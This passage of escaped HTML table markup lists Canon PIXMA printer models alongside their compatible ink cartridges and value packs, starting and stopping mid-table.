(Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"12\" align=\"center\">PIXMA iP8770</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Gray)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Gray)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"11\" align=\"center\">PIXMA iX6770</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-755XXL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"11\" align=\"center\">PIXMA iX6870</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-755XXL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MG2570S</td>\n<td>CL-746 (Colour)</td>\n</tr>\n<tr>\n<td>CL-746S (Colour)</td>\n</tr>\n<tr>\n<td>CL-746XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-745 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745S (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MG2577S</td>\n<td>CL-746 (Colour)</td>\n</tr>\n<tr>\n<td>CL-746S (Colour)</td>\n</tr>\n<tr>\n<td>CL-746XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-745 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745S (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745XL (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table border=\"1\" width=\"378\" cellpadding=\"10\"><tbody><tr align=\"center\"><td width=\"170\"><strong>Model</strong></td><td width=\"208\"><strong>Cartridge / Bottle</strong></td></tr><tr><td rowspan=\"5\" align=\"center\">PIXMA MG3570</td><td>CL-741 (Colour)</td></tr><tr><td>CL-741XL (Colour)</td></tr><tr><td>PG-740 (Pigment Black)</td></tr><tr><td>PG-740/CL-741 Value Pack</td></tr><tr><td>PG-740XL (Pigment Black)</td></tr><tr><td rowspan=\"5\" align=\"center\">PIXMA MG3670</td><td>CL-741 (Colour)</td></tr><tr><td>CL-741XL (Colour)</td></tr><tr><td>PG-740 (Pigment Black)</td></tr><tr><td>PG-740/CL-741 Value Pack</td></tr><tr><td>PG-740XL (Pigment Black)</td></tr><tr><td rowspan=\"10\" align=\"center\">PIXMA MG7570</td><td>CLI-751 (Black)</td></tr><tr><td>CLI-751 (Cyan)</td></tr><tr><td>CLI-751 (Gray)</td></tr><tr><td>CLI-751 (Magenta)</td></tr><tr><td>CLI-751 (Yellow)</td></tr><tr><td>CLI-751XL (Black)</td></tr><tr><td>CLI-751XL (Cyan)</td></tr><tr><td>CLI-751XL (Gray)</td></tr><tr><td>CLI-751XL (Magenta)</td></tr><tr><td>CLI-751XL (Yellow)</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA MP160</td><td>CL-41 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA MP170</td><td>CL-41 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA MP180</td><td>CL-41 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td rowspan=\"5\" align=\"center\">PIXMA MP228</td><td>CL-41 (Colour)</td></tr><tr><td>CL-831 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td>PG-830 (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP237</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP245</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP258</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP276</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr></tbody></table><table border=\"1\" width=\"378\" cellpadding=\"10\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MP287</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA MP460</td>\n<td>CL-41 (Colour)</td>\n</tr>\n<tr>\n<td>PG-40 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-40/CL-41 Value Pack</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP476</td>\n<td>CL-41 (Colour)</td>\n</tr>\n<tr>\n<td>CL-831 (Colour)</td>\n</tr>\n<tr>\n<td>PG-40 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-40/CL-41 Value Pack</td>\n</tr>\n<tr>\n<td>PG-830 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MP486</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MP496</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MP497</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP500</td>\n<td>CLI-8 (Black)</td>\n</tr>\n<tr>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA MP520</td>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP530</td>\n<td>CLI-8 (Black)</td>\n</tr>\n<tr>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP568</td>\n<td>CLI-821 (Black)</td>\n</tr>\n<tr>\n<td>CLI-821 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-821 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-821 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-820 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP600</td>\n<td>CLI-8 (Black)</td>\n</tr>\n<tr>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table width=\"378\" border=\"1\" cellpadding=\"10\">\n  <tbody>\n    <tr align=\"center\">\n      <td width=\"170\"><strong>Model</strong></td>\n      <td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP610</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP628</td>\n      <td>CLI-821 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-820 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP638</td>\n      <td>CLI-821 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-820 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP648</td>\n      <td>CLI-821 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-820 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP800</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP800R</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP810</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP830</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"7\" align=\"center\">PIXMA MP970</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Photo Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Photo Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP988</td>\n      <td>CLI-821 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Gray)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-820 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP996</td>\n      <td>CLI-821 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Gray)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-820 (Pigment Black)</td>\n    </tr>\n  </tbody>\n</table>\n<table width=\"378\" border=\"1\" cellpadding=\"10\">\n  <tbody>\n  <tr align=\"center\">\n    <td width=\"170\"><strong>Model</strong></td>\n    <td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n  </tr>\n  <tr>\n    <td rowspan=\"5\" align=\"center\">PIXMA MX308</td>\n    <td>CL-41 (Colour)</td>\n  </tr>\n  <tr>\n    <td>CL-831 (Colour)</td>\n  </tr>\n  <tr>\n    <td>PG-40 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td>PG-40/CL-41 Value Pack</td>\n  </tr>\n  <tr>\n    <td>PG-830 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"6\" align=\"center\">PIXMA MX328</td>\n    <td>CL-811 (Colour)</td>\n  </tr>\n  <tr>\n    <td>CL-811XL (Colour)</td>\n  </tr>\n  <tr>\n    <td>PG-810 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td>PG-810 Twin Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810/CL-811 Value Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810XL (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"6\" align=\"center\">PIXMA MX338</td>\n    <td>CL-811 (Colour)</td>\n  </tr>\n  <tr>\n    <td>CL-811XL (Colour)</td>\n  </tr>\n  <tr>\n    <td>PG-810 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td>PG-810 Twin Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810/CL-811 Value Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810XL (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"6\" align=\"center\">PIXMA MX347</td>\n    <td>CL-811 (Colour)</td>\n  </tr>\n  <tr>\n    <td>CL-811XL (Colour)</td>\n  </tr>\n  <tr>\n    <td>PG-810 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td>PG-810 Twin Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810/CL-811 Value Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810XL (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"6\" align=\"center\">PIXMA MX366</td>\n    <td>CL-811 (Colour)</td>\n  </tr>\n  <tr>\n    <td>CL-811XL (Colour)</td>\n  </tr>\n  <tr>\n    <td>PG-810 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td>PG-810 Twin Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810/CL-811 Value Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810XL (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"6\" align=\"center\">PIXMA MX426</td>\n    <td>CL-811 (Colour)</td>\n  </tr>\n  <tr>\n    <td>CL-811XL (Colour)</td>\n  </tr>\n  <tr>\n    <td>PG-810 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td>PG-810 Twin Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810/CL-811 Value Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810XL (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"5\" align=\"center\">PIXMA MX876</td>\n    <td>CLI-821 (Black)</td>\n  </tr>\n  <tr>\n    <td>CLI-821 (Cyan)</td>\n  </tr>\n  <tr>\n    <td>CLI-821 (Magenta)</td>\n  </tr>\n  <tr>\n    <td>CLI-821 (Yellow)</td>\n  </tr>\n  <tr>\n    <td>PGI-820 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"5\" align=\"center\">PIXMA MX886</td>\n    <td>CLI-726 (Black)</td>\n  </tr>\n  <tr>\n    <td>CLI-726 (Cyan)</td>\n  </tr>\n  <tr>\n    <td>CLI-726 (Magenta)</td>\n  </tr>\n  <tr>\n    <td>CLI-726 (Yellow)</td>\n  </tr>\n  <tr>\n    <td>PGI-725 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"12\" align=\"center\">PIXMA PRO-1</td>\n    <td>PGI-29 (Chroma Optimizer)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Cyan)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Dark Gray)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Gray)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Light Gray)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Magenta)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Matte Black)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Photo Black)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Photo Cyan)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Photo Magenta)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Red)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Yellow)</td>\n  </tr>\n  </tbody>\n</table>\n<table width=\"378\">\n<tbody>\n<tr>\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td width=\"170\">PIXMA PRO-10</td>\n<td width=\"208\">PGI-72 (Chroma Optimizer)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PGI-72 (Cyan)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PGI-72 (Gray)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PGI-72 (Magenta)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PGI-72 (Matte Black)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PGI-72 (Photo Black)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PGI-72 (Photo Cyan)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PGI-72 (Photo Magenta)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PGI-72 (Red)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PGI-72 (Yellow)</td>\n</tr>\n<tr>\n<td width=\"170\">PIXMA PRO-100</td>\n<td width=\"208\">CLI-42 (Black)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-42 (Cyan)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-42 (Gray)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-42 (Light Gray)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-42 (Magenta)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-42 (Photo Cyan)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-42 (Photo Magenta)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-42 (Yellow)</td>\n</tr>\n<tr>\n<td width=\"170\">PIXMA TR8570</td>\n<td width=\"208\">CLI-781 (Black)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-781 (Cyan)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-781 (Magenta)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-781 (Yellow)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-781XL (Black)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-781XL (Cyan)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-781XL (Magenta)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-781XL (Yellow)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PGI-780 (Pigment Black)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PGI-780XL (Pigment Black)</td>\n</tr>\n<tr>\n<td width=\"170\">PIXMA TS207</td>\n<td width=\"208\">CL-746 (Colour)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CL-746S (Colour)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CL-746XL (Colour)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PG-745 (Pigment Black)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PG-745S (Pigment Black)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PG-745XL (Pigment Black)</td>\n</tr>\n<tr>\n<td width=\"170\">PIXMA TS307</td>\n<td width=\"208\">CL-746 (Colour)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CL-746S (Colour)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CL-746XL (Colour)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PG-745 (Pigment Black)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PG-745S (Pigment Black)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PG-745XL (Pigment Black)</td>\n</tr>\n<tr>\n<td width=\"170\">PIXMA TS5070</td>\n<td width=\"208\">CLI-771 (Black)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-771 (Cyan)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-771 (Magenta)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-771 (Yellow)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-771XL (Black)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-771XL (Cyan)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-771XL (Magenta)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-771XL (Yellow)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PGI-770 (Pigment Black)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PGI-770XL (Pigment Black)</td>\n</tr>\n<tr>\n<td width=\"170\">PIXMA TS5170</td>\n<td width=\"208\">CL-741 (Colour)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CL-741XL (Colour)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PG-740 (Pigment Black)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PG-740/CL-741 Value Pack</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PG-740XL (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td 